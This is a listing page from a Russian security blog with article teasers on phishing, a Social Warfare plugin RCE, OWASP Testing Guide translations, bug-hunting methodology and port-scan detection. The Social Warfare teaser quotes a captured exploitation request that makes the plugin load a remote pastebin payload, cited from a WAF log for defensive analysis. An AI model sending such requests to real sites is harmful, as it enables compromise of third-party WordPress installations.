29.04.2019 @ 13:59 Фишинг: социальная инженерия через почту Pentestit, социальная инженерия Некоторое время назад на корпоративную почту пришло письмо. Оно содержало информацию о том, что закончился срок регистрации домена и необходимо произвести оплату. Читать далее Фишинг: социальная инженерия через почту → Hekpo 6159 Social engineering Читать дальше >>
03.04.2019 @ 13:30 Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare Pentestit, RCE, Social Warfare, XSS Статья носит информационный характер. Не нарушайте законодательство. Некоторое время назад WAF зафиксировал атаку, которая имела следующий вид: https://defcon.ru/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf Из открытых источников мы узнали, что атака представляла собой попытку эксплуатации хранимой XSS уязвимости в Social Warfare — популярном WordpPress-плагине, установленном более чем на 70000 сайтов. Это показалось интересным и мы решили разобраться в уязвимости более детально. Читать далее Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare → Hekpo 5749 Web security Читать дальше >>
07.12.2017 @ 11:36 Перевод OWASP Testing Guide. Часть 3.9. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет о сохранении паролей. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Обход аутентификации Читать далее Перевод OWASP Testing Guide. Часть 3.9. → abychutkin 15881 Web security Читать дальше >>
26.07.2017 @ 14:13 Перевод OWASP Testing Guide. Часть 3.8. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет об обходе аутентификации. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Определение правил генерации имен пользователей Изучение передачи пользовательских данных Тестирование учетных данных по умолчанию Изучение механизма блокировки учетных записей Читать далее Перевод OWASP Testing Guide. Часть 3.8. → abychutkin 34967 Web security Читать дальше >>
29.06.2017 @ 10:41 Перевод OWASP Testing Guide. Часть 3.7. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет о механизме блокировки учетных записей. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Определение правил генерации имен пользователей Изучение передачи пользовательских данных Тестирование учетных данных по умолчанию Читать далее Перевод OWASP Testing Guide. Часть 3.7. → abychutkin 9446 Web security Читать дальше >>
22.06.2017 @ 12:05 Перевод OWASP Testing Guide. Часть 3.6. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет о учетных данных по умолчанию. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Определение правил генерации имен пользователей Изучение передачи пользовательских данных Читать далее Перевод OWASP Testing Guide. Часть 3.6. → abychutkin 11775 Web security Читать дальше >>
06.06.2017 @ 10:56 Перевод OWASP Testing Guide. Часть 3.5. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет о передаче пользовательских данных. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Определение правил генерации имен пользователей Читать далее Перевод OWASP Testing Guide. Часть 3.5. → abychutkin 9330 Web security Читать дальше >>
10.05.2017 @ 16:58 The Bug Hunters Methodology. Часть 2, 3. bug-bounty, bug-hunter, Methodology, pentest, web security The Bug Hunters Methodology: обнаружение цели и о составление карты архитектуры веб-приложения. Предыдущие статьи: Философия Читать далее The Bug Hunters Methodology. Часть 2, 3. → xb 9380 Penetration testing Читать дальше >>
12.04.2017 @ 18:40 Port Scan Attack Detector (PSAD) ids, IPS, psad PSAD — представляет собой набор из трех легких системных демонов, которые работают на Linux и анализируют логи iptables для обнаружения сканирования портов и наличие подозрительного трафика. Читать далее Port Scan Attack Detector (PSAD) → n0odel 10820 Network security Читать дальше >>
27.02.2017 @ 14:13 Аудит Web-приложения – систематизируем тестирование Methodology, pentest, web security В предыдущей статье я рассмотрел методологию тестирования Web-приложения. Она не является обязательным стандартом, но поможет вам не пропустить уязвимости в больших проектах. Теперь я подробнее опишу каждый из этапов. Читать далее Аудит Web-приложения – систематизируем тестирование → leksadin 10119 Penetration testing Читать дальше >>